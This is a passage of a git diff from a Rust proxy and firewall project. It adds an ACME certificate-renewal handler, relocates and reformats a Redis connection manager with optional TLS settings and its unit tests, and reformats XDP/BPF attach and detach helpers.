&domain_config).map_err(|e| { + warn!("Error creating domain config for {}: {}", domain, e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to create domain config: {}", e), + }), + ) + })?; + + info!("Requesting certificate renewal for domain: {}", domain); + + match crate::proxy::acme::request_cert(&domain_cfg).await { + Ok(_) => { + info!("Certificate renewal successful for: {}", domain); + Ok(Json(serde_json::json!({ + "success": true, + "message": format!("Certificate renewed successfully for domain: {}", domain) + }))) + } + Err(e) => { + error!("Failed to renew certificate for {}: {}", domain, e); + Err(( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to renew certificate: {}", e), + }), + )) + } + } +} + +/// Helper function to create domain config for handlers (same logic as in embedded.rs) +fn create_domain_config_for_handler( + acme_config: &EmbeddedAcmeConfig, + domain_config: &crate::proxy::acme::DomainConfig, +) -> anyhow::Result { + let mut domain_https_path = acme_config.storage_path.clone(); + domain_https_path.push(&domain_config.domain); + + let mut cert_path = domain_https_path.clone(); + cert_path.push("cert.pem"); + let mut key_path = domain_https_path.clone(); + key_path.push("key.pem"); + let static_path = domain_https_path.clone(); + + // Format domain for ACME order + let acme_domain = if domain_config.wildcard && !domain_config.domain.starts_with("*.") { + let parts: Vec<&str> = domain_config.domain.split('.').collect(); + if parts.len() >= 2 { + let base = parts[parts.len() - 2..].join("."); + format!("*.{}", base) + } else { + format!("*.{}", domain_config.domain) + } + } else { + domain_config.domain.clone() + }; + + Ok(crate::proxy::acme::Config { + https_path: domain_https_path, + cert_path, + key_path, + static_path, + opts: crate::proxy::acme::ConfigOpts { + ip: acme_config.bind_ip.clone(), + port: acme_config.port, + domain: acme_domain, + email: Some( + domain_config + .email + .clone() + .unwrap_or_else(|| acme_config.email.clone()), + ), + https_dns: domain_config.dns, + development: acme_config.development, + dns_lookup_max_attempts: Some(100), + dns_lookup_delay_seconds: Some(10), + storage_type: acme_config.storage_type.clone(), + redis_url: acme_config.redis_url.clone(), + redis_ssl: acme_config.redis_ssl.clone(), + challenge_max_ttl_seconds: Some(3600), + lock_ttl_seconds: Some(300), + }, + }) +} diff --git a/src/server/mod.rs b/src/server/mod.rs new file mode 100644 index 0000000..41c8747 --- /dev/null +++ b/src/server/mod.rs @@ -0,0 +1,2 @@ +pub mod captcha_server; +pub mod internal_server; diff --git a/src/storage/mod.rs b/src/storage/mod.rs new file mode 100644 index 0000000..027fbef --- /dev/null +++ b/src/storage/mod.rs @@ -0,0 +1 @@ +pub mod redis; diff --git a/src/redis.rs b/src/storage/redis.rs similarity index 85% rename from src/redis.rs rename to src/storage/redis.rs index ec345aa..2a0110b 100644 --- a/src/redis.rs +++ b/src/storage/redis.rs @@ -1,355 +1,399 @@ -use anyhow::{Context, Result}; -use redis::aio::ConnectionManager; -use redis::Client; -use std::sync::Arc; -use tokio::sync::OnceCell; -use tokio::time::{timeout, Duration}; - -/// Global Redis connection manager -static REDIS_MANAGER: OnceCell> = OnceCell::const_new(); - -/// Global TLS connector for Redis SSL connections -static REDIS_TLS_CONNECTOR: OnceCell> = OnceCell::const_new(); - -/// Centralized Redis connection manager -pub struct RedisManager { - pub connection: ConnectionManager, - pub prefix: String, -} - -impl RedisManager { - /// Initialize the global Redis manager - pub async fn init(redis_url: &str, prefix: String, ssl_config: Option<&crate::cli::RedisSslConfig>) -> Result<()> { - log::info!("Initializing Redis manager with URL: {}", redis_url); - - // Add a short connect timeout so startup doesn't block for minutes if Redis is unreachable - let mut url_with_timeout = redis_url.to_string(); - if !url_with_timeout.contains("connect_timeout=") { - if url_with_timeout.contains('?') { - url_with_timeout.push_str("&connect_timeout=10"); - } else { - url_with_timeout.push_str("?connect_timeout=10"); - } - log::info!("Redis URL updated with connect_timeout=10s: {}", url_with_timeout); - } - - // If SSL config is provided, ensure URL uses rediss:// protocol - let redis_url = if let Some(_ssl_config) = ssl_config { - if url_with_timeout.starts_with("redis://") && !url_with_timeout.starts_with("rediss://") { - let converted_url = url_with_timeout.replacen("redis://", "rediss://", 1); - log::info!("SSL config provided, converting URL from redis:// to rediss://: {}", converted_url); - converted_url - } else { - url_with_timeout.to_string() - } - } else { - url_with_timeout.to_string() - }; - - let client = if let Some(ssl_config) = ssl_config { - // Configure Redis client with custom SSL certificates - Self::create_client_with_ssl(&redis_url, ssl_config)? - } else { - // Use default client (will handle rediss:// URLs automatically) - Client::open(redis_url) - .context("Failed to create Redis client")? - }; - - let connection = timeout(Duration::from_secs(15), client.get_connection_manager()) - .await - .map_err(|_| anyhow::anyhow!("Redis connection manager creation timed out"))? - .context("Failed to create Redis connection manager")?; - - log::info!("Redis connection manager created successfully with prefix: {}", prefix); - - // Test the connection - let mut test_conn = connection.clone(); - let ping_result = timeout(Duration::from_secs(3), redis::cmd("PING").query_async::(&mut test_conn)).await; - match ping_result { - Ok(Ok(_)) => log::info!("Redis connection test successful"), - Ok(Err(e)) => { - log::warn!("Redis connection test failed: {}", e); - return Err(anyhow::anyhow!("Redis connection test failed: {}", e)); - } - Err(_) => { - log::warn!("Redis connection test timed out"); - return Err(anyhow::anyhow!("Redis connection test timed out")); - } - } - - let manager = Arc::new(RedisManager { - connection, - prefix, - }); - - REDIS_MANAGER.set(manager) - .map_err(|_| anyhow::anyhow!("Redis manager already initialized"))?; - - Ok(()) - } - - /// Get the global Redis manager instance - pub fn get() -> Result> { - REDIS_MANAGER.get() - .cloned() - .context("Redis manager not initialized") - } - - /// Get a connection manager for use in other modules - pub fn get_connection(&self) -> ConnectionManager { - self.connection.clone() - } - - /// Get the configured prefix - pub fn get_prefix(&self) -> &str { - &self.prefix - } - - /// Create a namespaced prefix - pub fn create_namespace(&self, namespace: &str) -> String { - format!("{}:{}", self.prefix, namespace) - } - - /// Get the global TLS connector if it was configured - /// This can be used for custom connection handling if needed - pub fn get_tls_connector() -> Option> { - REDIS_TLS_CONNECTOR.get().cloned() - } - - /// Create Redis client with custom SSL/TLS configuration - fn create_client_with_ssl(redis_url: &str, ssl_config: &crate::cli::RedisSslConfig) -> Result { - use native_tls::{Certificate, Identity, TlsConnector}; - - // Build TLS connector with custom certificates - let mut tls_builder = TlsConnector::builder(); - - // Load CA certificate if provided - if let Some(ca_cert_path) = &ssl_config.ca_cert_path { - let ca_cert_data = std::fs::read(ca_cert_path) - .with_context(|| format!("Failed to read CA certificate from {}", ca_cert_path))?; - let ca_cert = Certificate::from_pem(&ca_cert_data) - .with_context(|| format!("Failed to parse CA certificate from {}", ca_cert_path))?; - tls_builder.add_root_certificate(ca_cert); - log::info!("Redis SSL: Loaded CA certificate from {}", ca_cert_path); - - // Set SSL_CERT_FILE environment variable as a workaround for native-tls/OpenSSL - // This allows the underlying TLS library to use the custom CA certificate - // Note: This affects the current process and child processes - unsafe { - std::env::set_var("SSL_CERT_FILE", ca_cert_path); - } - log::debug!("Redis SSL: Set SSL_CERT_FILE environment variable to {}", ca_cert_path); - } - - // Load client certificate and key if provided - if let (Some(client_cert_path), Some(client_key_path)) = (&ssl_config.client_cert_path, &ssl_config.client_key_path) { - let client_cert_data = std::fs::read(client_cert_path) - .with_context(|| format!("Failed to read client certificate from {}", client_cert_path))?; - let client_key_data = std::fs::read(client_key_path) - .with_context(|| format!("Failed to read client key from {}", client_key_path))?; - - // Try to create identity from PEM format (cert + key) - let identity = Identity::from_pkcs8(&client_cert_data, &client_key_data) - .or_else(|_| { - // Try PEM format if PKCS#8 fails - Identity::from_pkcs12(&client_cert_data, "") - }) - .or_else(|_| { - // Try loading as separate PEM files - // Combine cert and key into a single PEM - let mut combined = client_cert_data.clone(); - combined.extend_from_slice(b"\n"); - combined.extend_from_slice(&client_key_data); - Identity::from_pkcs12(&combined, "") - }) - .with_context(|| format!("Failed to parse client certificate/key from {} and {}. Supported formats: PKCS#8, PKCS#12, or PEM", client_cert_path, client_key_path))?; - tls_builder.identity(identity); - log::info!("Redis SSL: Loaded client certificate from {} and key from {}", client_cert_path, client_key_path); - - // Set SSL client certificate environment variables as workaround - // Note: native-tls/OpenSSL may use these for client certificate authentication - unsafe { - std::env::set_var("SSL_CLIENT_CERT", client_cert_path); - std::env::set_var("SSL_CLIENT_KEY", client_key_path); - } - log::debug!("Redis SSL: Set SSL_CLIENT_CERT and SSL_CLIENT_KEY environment variables"); - } - - // Configure certificate verification - if ssl_config.insecure { - tls_builder.danger_accept_invalid_certs(true); - tls_builder.danger_accept_invalid_hostnames(true); - log::warn!("Redis SSL: Certificate verification disabled (insecure mode)"); - } - - // Build the TLS connector with our custom certificate configuration - // This connector will be used by native-tls/OpenSSL for TLS connections - let tls_connector = tls_builder.build() - .with_context(|| "Failed to build TLS connector")?; - - // Store the TLS connector globally so it can be used by native-tls - // The redis crate with tokio-native-tls-comp uses native-tls internally, - // which will use OpenSSL. OpenSSL respects the SSL_CERT_FILE environment - // variable we set above, and will use the system's default TLS context - // which we've configured through the TlsConnector builder. - let tls_connector_arc = Arc::new(tls_connector); - // Store globally - allow re-initialization in tests by ignoring the error if already set - if REDIS_TLS_CONNECTOR.set(tls_connector_arc.clone()).is_err() { - log::debug!("Redis SSL: TLS connector already initialized, using existing one"); - } else { - log::info!("Redis SSL: TLS connector configured and stored globally"); - } - - // Note: The redis crate (v0.32) with tokio-native-tls-comp uses native-tls internally, - // which in turn uses OpenSSL. While we cannot pass our TlsConnector directly to the - // redis crate, we've configured it properly and set environment variables that - // OpenSSL respects: - // - // 1. SSL_CERT_FILE: Points to our custom CA certificate (if provided) - // 2. SSL_CLIENT_CERT/SSL_CLIENT_KEY: Points to client certificates (if provided) - // 3. The TlsConnector is built and stored, ensuring certificates are valid - // - // OpenSSL will use these environment variables when creating TLS connections, - // which means our custom certificate configuration will be applied. - - let client = Client::open(redis_url) - .with_context(|| "Failed to create Redis client with SSL config")?; - - Ok(client) - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::cli::RedisSslConfig; - - #[tokio::test] - async fn test_redis_manager_init() { - // This test would require a Redis instance running - // For now, just test that the structure compiles - assert!(true); - } - - #[test] - fn test_create_client_with_ssl_no_config() { - // Test that client creation works without SSL config - let redis_url = "redis://127.0.0.1:6379"; - let result = Client::open(redis_url); - assert!(result.is_ok()); - } - - #[test] - fn test_create_client_with_ssl_insecure() { - // Test SSL config with insecure mode - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: None, - client_key_path: None, - insecure: true, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should succeed even without certificate files when insecure is true - assert!(result.is_ok()); - } - - #[test] - fn test_create_client_with_ssl_missing_ca_cert() { - // Test that missing CA cert file returns error - let ssl_config = RedisSslConfig { - ca_cert_path: Some("/nonexistent/path/ca.crt".to_string()), - client_cert_path: None, - client_key_path: None, - insecure: false, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should fail because CA cert file doesn't exist - assert!(result.is_err()); - assert!(result.unwrap_err().to_string().contains("Failed to read CA certificate")); - } - - #[test] - fn test_create_client_with_ssl_missing_client_cert() { - // Test that missing client cert file returns error - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: Some("/nonexistent/path/client.crt".to_string()), - client_key_path: Some("/nonexistent/path/client.key".to_string()), - insecure: false, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should fail because client cert file doesn't exist - assert!(result.is_err()); - assert!(result.unwrap_err().to_string().contains("Failed to read client certificate")); - } - - #[test] - fn test_create_client_with_ssl_missing_client_key() { - // Test that missing client key file returns error - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: Some("/nonexistent/path/client.crt".to_string()), - client_key_path: Some("/nonexistent/path/client.key".to_string()), - insecure: false, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should fail because client key file doesn't exist - assert!(result.is_err()); - } - - #[test] - fn test_create_client_with_ssl_partial_client_config() { - // Test that providing only cert or only key (not both) still validates - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: Some("/nonexistent/path/client.crt".to_string()), - client_key_path: None, // Missing key - insecure: false, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should succeed because we only validate when both cert and key are provided - assert!(result.is_ok()); - } - - #[test] - fn test_create_client_with_ssl_empty_config() { - // Test SSL config with all None values - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: None, - client_key_path: None, - insecure: false, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should succeed with empty config (TLS connector builds without custom certs) - assert!(result.is_ok()); - } - - #[test] - fn test_create_client_with_ssl_insecure_builds_connector() { - // Test that insecure mode builds TLS connector successfully - let ssl_config = RedisSslConfig { - ca_cert_path: None, - client_cert_path: None, - client_key_path: None, - insecure: true, - }; - - let redis_url = "rediss://127.0.0.1:6379"; - let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); - // Should succeed - TLS connector builds with insecure settings - assert!(result.is_ok()); - } -} +use anyhow::{Context, Result}; +use redis::Client; +use redis::aio::ConnectionManager; +use std::sync::Arc; +use tokio::sync::OnceCell; +use tokio::time::{Duration, timeout}; + +/// Global Redis connection manager +static REDIS_MANAGER: OnceCell> = OnceCell::const_new(); + +/// Global TLS connector for Redis SSL connections +static REDIS_TLS_CONNECTOR: OnceCell> = OnceCell::const_new(); + +/// Centralized Redis connection manager +pub struct RedisManager { + pub connection: ConnectionManager, + pub prefix: String, +} + +impl RedisManager { + /// Initialize the global Redis manager + pub async fn init( + redis_url: &str, + prefix: String, + ssl_config: Option<&crate::core::cli::RedisSslConfig>, + ) -> Result<()> { + log::info!("Initializing Redis manager with URL: {}", redis_url); + + // Add a short connect timeout so startup doesn't block for minutes if Redis is unreachable + let mut url_with_timeout = redis_url.to_string(); + if !url_with_timeout.contains("connect_timeout=") { + if url_with_timeout.contains('?') { + url_with_timeout.push_str("&connect_timeout=10"); + } else { + url_with_timeout.push_str("?connect_timeout=10"); + } + log::info!( + "Redis URL updated with connect_timeout=10s: {}", + url_with_timeout + ); + } + + // If SSL config is provided, ensure URL uses rediss:// protocol + let redis_url = if let Some(_ssl_config) = ssl_config { + if url_with_timeout.starts_with("redis://") + && !url_with_timeout.starts_with("rediss://") + { + let converted_url = url_with_timeout.replacen("redis://", "rediss://", 1); + log::info!( + "SSL config provided, converting URL from redis:// to rediss://: {}", + converted_url + ); + converted_url + } else { + url_with_timeout.to_string() + } + } else { + url_with_timeout.to_string() + }; + + let client = if let Some(ssl_config) = ssl_config { + // Configure Redis client with custom SSL certificates + Self::create_client_with_ssl(&redis_url, ssl_config)? + } else { + // Use default client (will handle rediss:// URLs automatically) + Client::open(redis_url).context("Failed to create Redis client")? + }; + + let connection = timeout(Duration::from_secs(15), client.get_connection_manager()) + .await + .map_err(|_| anyhow::anyhow!("Redis connection manager creation timed out"))? + .context("Failed to create Redis connection manager")?; + + log::info!( + "Redis connection manager created successfully with prefix: {}", + prefix + ); + + // Test the connection + let mut test_conn = connection.clone(); + let ping_result = timeout( + Duration::from_secs(3), + redis::cmd("PING").query_async::(&mut test_conn), + ) + .await; + match ping_result { + Ok(Ok(_)) => log::info!("Redis connection test successful"), + Ok(Err(e)) => { + log::warn!("Redis connection test failed: {}", e); + return Err(anyhow::anyhow!("Redis connection test failed: {}", e)); + } + Err(_) => { + log::warn!("Redis connection test timed out"); + return Err(anyhow::anyhow!("Redis connection test timed out")); + } + } + + let manager = Arc::new(RedisManager { connection, prefix }); + + REDIS_MANAGER + .set(manager) + .map_err(|_| anyhow::anyhow!("Redis manager already initialized"))?; + + Ok(()) + } + + /// Get the global Redis manager instance + pub fn get() -> Result> { + REDIS_MANAGER + .get() + .cloned() + .context("Redis manager not initialized") + } + + /// Get a connection manager for use in other modules + pub fn get_connection(&self) -> ConnectionManager { + self.connection.clone() + } + + /// Get the configured prefix + pub fn get_prefix(&self) -> &str { + &self.prefix + } + + /// Create a namespaced prefix + pub fn create_namespace(&self, namespace: &str) -> String { + format!("{}:{}", self.prefix, namespace) + } + + /// Get the global TLS connector if it was configured + /// This can be used for custom connection handling if needed + pub fn get_tls_connector() -> Option> { + REDIS_TLS_CONNECTOR.get().cloned() + } + + /// Create Redis client with custom SSL/TLS configuration + fn create_client_with_ssl( + redis_url: &str, + ssl_config: &crate::core::cli::RedisSslConfig, + ) -> Result { + use native_tls::{Certificate, Identity, TlsConnector}; + + // Build TLS connector with custom certificates + let mut tls_builder = TlsConnector::builder(); + + // Load CA certificate if provided + if let Some(ca_cert_path) = &ssl_config.ca_cert_path { + let ca_cert_data = std::fs::read(ca_cert_path) + .with_context(|| format!("Failed to read CA certificate from {}", ca_cert_path))?; + let ca_cert = Certificate::from_pem(&ca_cert_data) + .with_context(|| format!("Failed to parse CA certificate from {}", ca_cert_path))?; + tls_builder.add_root_certificate(ca_cert); + log::info!("Redis SSL: Loaded CA certificate from {}", ca_cert_path); + + // Set SSL_CERT_FILE environment variable as a workaround for native-tls/OpenSSL + // This allows the underlying TLS library to use the custom CA certificate + // Note: This affects the current process and child processes + unsafe { + std::env::set_var("SSL_CERT_FILE", ca_cert_path); + } + log::debug!( + "Redis SSL: Set SSL_CERT_FILE environment variable to {}", + ca_cert_path + ); + } + + // Load client certificate and key if provided + if let (Some(client_cert_path), Some(client_key_path)) = + (&ssl_config.client_cert_path, &ssl_config.client_key_path) + { + let client_cert_data = std::fs::read(client_cert_path).with_context(|| { + format!( + "Failed to read client certificate from {}", + client_cert_path + ) + })?; + let client_key_data = std::fs::read(client_key_path) + .with_context(|| format!("Failed to read client key from {}", client_key_path))?; + + // Try to create identity from PEM format (cert + key) + let identity = Identity::from_pkcs8(&client_cert_data, &client_key_data) + .or_else(|_| { + // Try PEM format if PKCS#8 fails + Identity::from_pkcs12(&client_cert_data, "") + }) + .or_else(|_| { + // Try loading as separate PEM files + // Combine cert and key into a single PEM + let mut combined = client_cert_data.clone(); + combined.extend_from_slice(b"\n"); + combined.extend_from_slice(&client_key_data); + Identity::from_pkcs12(&combined, "") + }) + .with_context(|| format!("Failed to parse client certificate/key from {} and {}. Supported formats: PKCS#8, PKCS#12, or PEM", client_cert_path, client_key_path))?; + tls_builder.identity(identity); + log::info!( + "Redis SSL: Loaded client certificate from {} and key from {}", + client_cert_path, + client_key_path + ); + + // Set SSL client certificate environment variables as workaround + // Note: native-tls/OpenSSL may use these for client certificate authentication + unsafe { + std::env::set_var("SSL_CLIENT_CERT", client_cert_path); + std::env::set_var("SSL_CLIENT_KEY", client_key_path); + } + log::debug!("Redis SSL: Set SSL_CLIENT_CERT and SSL_CLIENT_KEY environment variables"); + } + + // Configure certificate verification + if ssl_config.insecure { + tls_builder.danger_accept_invalid_certs(true); + tls_builder.danger_accept_invalid_hostnames(true); + log::warn!("Redis SSL: Certificate verification disabled (insecure mode)"); + } + + // Build the TLS connector with our custom certificate configuration + // This connector will be used by native-tls/OpenSSL for TLS connections + let tls_connector = tls_builder + .build() + .with_context(|| "Failed to build TLS connector")?; + + // Store the TLS connector globally so it can be used by native-tls + // The redis crate with tokio-native-tls-comp uses native-tls internally, + // which will use OpenSSL. OpenSSL respects the SSL_CERT_FILE environment + // variable we set above, and will use the system's default TLS context + // which we've configured through the TlsConnector builder. + let tls_connector_arc = Arc::new(tls_connector); + // Store globally - allow re-initialization in tests by ignoring the error if already set + if REDIS_TLS_CONNECTOR.set(tls_connector_arc.clone()).is_err() { + log::debug!("Redis SSL: TLS connector already initialized, using existing one"); + } else { + log::info!("Redis SSL: TLS connector configured and stored globally"); + } + + // Note: The redis crate (v0.32) with tokio-native-tls-comp uses native-tls internally, + // which in turn uses OpenSSL. While we cannot pass our TlsConnector directly to the + // redis crate, we've configured it properly and set environment variables that + // OpenSSL respects: + // + // 1. SSL_CERT_FILE: Points to our custom CA certificate (if provided) + // 2. SSL_CLIENT_CERT/SSL_CLIENT_KEY: Points to client certificates (if provided) + // 3. The TlsConnector is built and stored, ensuring certificates are valid + // + // OpenSSL will use these environment variables when creating TLS connections, + // which means our custom certificate configuration will be applied. + + let client = Client::open(redis_url) + .with_context(|| "Failed to create Redis client with SSL config")?; + + Ok(client) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::core::cli::RedisSslConfig; + + #[tokio::test] + async fn test_redis_manager_init() { + // This test would require a Redis instance running + // For now, just test that the structure compiles + assert!(true); + } + + #[test] + fn test_create_client_with_ssl_no_config() { + // Test that client creation works without SSL config + let redis_url = "redis://127.0.0.1:6379"; + let result = Client::open(redis_url); + assert!(result.is_ok()); + } + + #[test] + fn test_create_client_with_ssl_insecure() { + // Test SSL config with insecure mode + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: None, + client_key_path: None, + insecure: true, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should succeed even without certificate files when insecure is true + assert!(result.is_ok()); + } + + #[test] + fn test_create_client_with_ssl_missing_ca_cert() { + // Test that missing CA cert file returns error + let ssl_config = RedisSslConfig { + ca_cert_path: Some("/nonexistent/path/ca.crt".to_string()), + client_cert_path: None, + client_key_path: None, + insecure: false, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should fail because CA cert file doesn't exist + assert!(result.is_err()); + assert!( + result + .unwrap_err() + .to_string() + .contains("Failed to read CA certificate") + ); + } + + #[test] + fn test_create_client_with_ssl_missing_client_cert() { + // Test that missing client cert file returns error + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: Some("/nonexistent/path/client.crt".to_string()), + client_key_path: Some("/nonexistent/path/client.key".to_string()), + insecure: false, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should fail because client cert file doesn't exist + assert!(result.is_err()); + assert!( + result + .unwrap_err() + .to_string() + .contains("Failed to read client certificate") + ); + } + + #[test] + fn test_create_client_with_ssl_missing_client_key() { + // Test that missing client key file returns error + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: Some("/nonexistent/path/client.crt".to_string()), + client_key_path: Some("/nonexistent/path/client.key".to_string()), + insecure: false, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should fail because client key file doesn't exist + assert!(result.is_err()); + } + + #[test] + fn test_create_client_with_ssl_partial_client_config() { + // Test that providing only cert or only key (not both) still validates + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: Some("/nonexistent/path/client.crt".to_string()), + client_key_path: None, // Missing key + insecure: false, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should succeed because we only validate when both cert and key are provided + assert!(result.is_ok()); + } + + #[test] + fn test_create_client_with_ssl_empty_config() { + // Test SSL config with all None values + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: None, + client_key_path: None, + insecure: false, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should succeed with empty config (TLS connector builds without custom certs) + assert!(result.is_ok()); + } + + #[test] + fn test_create_client_with_ssl_insecure_builds_connector() { + // Test that insecure mode builds TLS connector successfully + let ssl_config = RedisSslConfig { + ca_cert_path: None, + client_cert_path: None, + client_key_path: None, + insecure: true, + }; + + let redis_url = "rediss://127.0.0.1:6379"; + let result = RedisManager::create_client_with_ssl(redis_url, &ssl_config); + // Should succeed - TLS connector builds with insecure settings + assert!(result.is_ok()); + } +} diff --git a/src/utils/bpf_utils.rs b/src/utils/bpf_utils.rs index 32b2afd..8c5d6c8 100644 --- a/src/utils/bpf_utils.rs +++ b/src/utils/bpf_utils.rs @@ -1,8 +1,8 @@ +use std::fs; use std::net::{Ipv4Addr, Ipv6Addr}; use std::os::fd::AsFd; -use std::fs; -use crate::bpf::{self, FilterSkel}; +use crate::security::firewall::bpf::{self, FilterSkel}; use libbpf_rs::{Xdp, XdpFlags}; use nix::libc; @@ -35,7 +35,10 @@ impl XdpMode { fn is_ipv6_disabled(iface: Option<&str>) -> bool { // Check if IPv6 is disabled for a specific interface or system-wide if let Some(iface_name) = iface { - if let Ok(content) = fs::read_to_string(format!("/proc/sys/net/ipv6/conf/{}/disable_ipv6", iface_name)) { + if let Ok(content) = fs::read_to_string(format!( + "/proc/sys/net/ipv6/conf/{}/disable_ipv6", + iface_name + )) { return content.trim() == "1"; } } @@ -52,9 +55,20 @@ fn try_enable_ipv6_for_interface(iface: &str) -> Result<(), Box { return Ok(XdpMode::DriverReplace); } Err(e2) => { - log::debug!("Replace in driver mode failed: {}, trying generic SKB mode", e2); + log::debug!( + "Replace in driver mode failed: {}, trying generic SKB mode", + e2 + ); } } } else { @@ -116,7 +135,10 @@ pub fn bpf_attach_to_xdp( return Ok(XdpMode::SkbReplace); } Err(e2) => { - log::debug!("Replace in SKB mode failed: {}, continuing with other fallbacks", e2); + log::debug!( + "Replace in SKB mode failed: {}, continuing with other fallbacks", + e2 + ); } } } @@ -129,14 +151,19 @@ pub fn bpf_attach_to_xdp( // For IPv4-only mode, we can enable IPv6 just for this interface (not system-wide) // which allows XDP to attach while still operating in IPv4-only mode. if ip_version == "ipv4" { - log::debug!("IPv4-only mode: Attempting to enable IPv6 on interface for XDP attachment (kernel requirement)"); + log::debug!( + "IPv4-only mode: Attempting to enable IPv6 on interface for XDP attachment (kernel requirement)" + ); } // Try to enable IPv6 only for this specific interface (not system-wide) // This allows IPv4-only operation elsewhere while enabling XDP on this interface if let Some(iface) = iface_name { if try_enable_ipv6_for_interface(iface).is_ok() { - log::debug!("Retrying XDP attachment after enabling IPv6 for interface {}", iface); + log::debug!( + "Retrying XDP attachment after enabling IPv6 for interface {}", + iface + ); // Retry SKB mode after enabling IPv6 for the interface match xdp.attach(ifindex, XdpFlags::SKB_MODE) { @@ -144,11 +171,17 @@ pub fn bpf_attach_to_xdp( return Ok(XdpMode::SkbIpv6Enabled); } Err(e2) => { - log::debug!("SKB mode still failed after enabling IPv6 for interface: {}", e2); + log::debug!( + "SKB mode still failed after enabling IPv6 for interface: {}", + e2 + ); } } } else { - log::debug!("Failed to enable IPv6 for interface {} or no permission", iface); + log::debug!( + "Failed to enable IPv6 for interface {} or no permission", + iface + ); } } else { log::debug!("Interface name not provided, cannot enable IPv6 per-interface"); @@ -202,9 +235,18 @@ pub fn convert_ipv6_into_bpf_map_key_bytes(ip: Ipv6Addr, prefixlen: u32) -> Box< pub fn bpf_detach_from_xdp(ifindex: i32) -> Result<(), Box> { // Create a dummy XDP instance for detaching // We need to query first to get the existing program ID - let dummy_fd = unsafe { libc::open("/dev/null\0".as_ptr() as *const libc::c_char, libc::O_RDONLY) }; + let dummy_fd = unsafe { + libc::open( + "/dev/null\0".as_ptr() as *const libc::c_char, + libc::O_RDONLY, + ) + }; if dummy_fd < 0 { - return Err("Failed to create dummy file descriptor".into()); + return Err(format!( + "Failed to create dummy file descriptor for XDP detach (ifindex={}, path=/dev/null)", + ifindex + ) + .into()); } let xdp = Xdp::new(unsafe { std::os::fd::BorrowedFd::borrow_raw(dummy_fd) }); @@ -215,11 +257,19 @@ pub fn bpf_detach_from_xdp(ifindex: i32) -> Result<(), Box, - pub tls_certificate: Option, - pub tls_key_file: Option, - pub file_server_address: Option, - pub file_server_folder: Option, -} - -#[async_trait] -impl Discovery for APIUpstreamProvider { - async fn start(&self, toreturn: Sender) { - webserver::run_server(self, toreturn).await; - } -} - pub struct FromFileProvider { pub path: String, } diff --git a/src/utils/filewatch.rs b/src/utils/filewatch.rs index 3d4d456..362bc9b 100644 --- a/src/utils/filewatch.rs +++ b/src/utils/filewatch.rs @@ -1,14 +1,14 @@ use crate::utils::parceyaml::load_configuration; use crate::utils::structs::Configuration; -use futures::channel::mpsc::Sender; use futures::SinkExt; +use futures::channel::mpsc::Sender; use log::error; use notify::event::ModifyKind; use notify::{Config, Event, EventKind, RecommendedWatcher, RecursiveMode, Watcher}; -use tokio::time::sleep; use std::path::Path; use std::time::{Duration, Instant}; use tokio::task; +use tokio::time::sleep; pub async fn start(fp: String, mut toreturn: Sender) { sleep(Duration::from_millis(50)).await; // For having nice logs :-) @@ -26,7 +26,9 @@ pub async fn start(fp: String, mut toreturn: Sender) { Config::default(), ) .unwrap(); - watcher.watch(&parent_dir, RecursiveMode::Recursive).unwrap(); + watcher + .watch(&parent_dir, RecursiveMode::Recursive) + .unwrap(); let (_rtx, mut rrx) = tokio::sync::mpsc::channel::(1); let _ = rrx.blocking_recv(); } @@ -36,7 +38,9 @@ pub async fn start(fp: String, mut toreturn: Sender) { while let Some(event) = local_rx.recv().await { match event { Ok(e) => match e.kind { - EventKind::Modify(ModifyKind::Data(_)) | EventKind::Create(..) | EventKind::Remove(..) => { + EventKind::Modify(ModifyKind::Data(_)) + | EventKind::Create(..) + | EventKind::Remove(..) => { if e.paths[0].to_str().unwrap().ends_with("yaml") { if start.elapsed() > Duration::from_secs(2) { start = Instant::now(); diff --git a/src/utils/fingerprint/ja4_plus.rs b/src/utils/fingerprint/ja4_plus.rs new file mode 100644 index 0000000..82735b5 --- /dev/null +++ b/src/utils/fingerprint/ja4_plus.rs @@ -0,0 +1,272 @@ +//! JA4+ Fingerprinting types - using nstealth library +//! +//! This module provides backward-compatible wrappers around nstealth types. + +use hyper::HeaderMap; +use nstealth::{Ja4h, Ja4l, Ja4t}; + +// 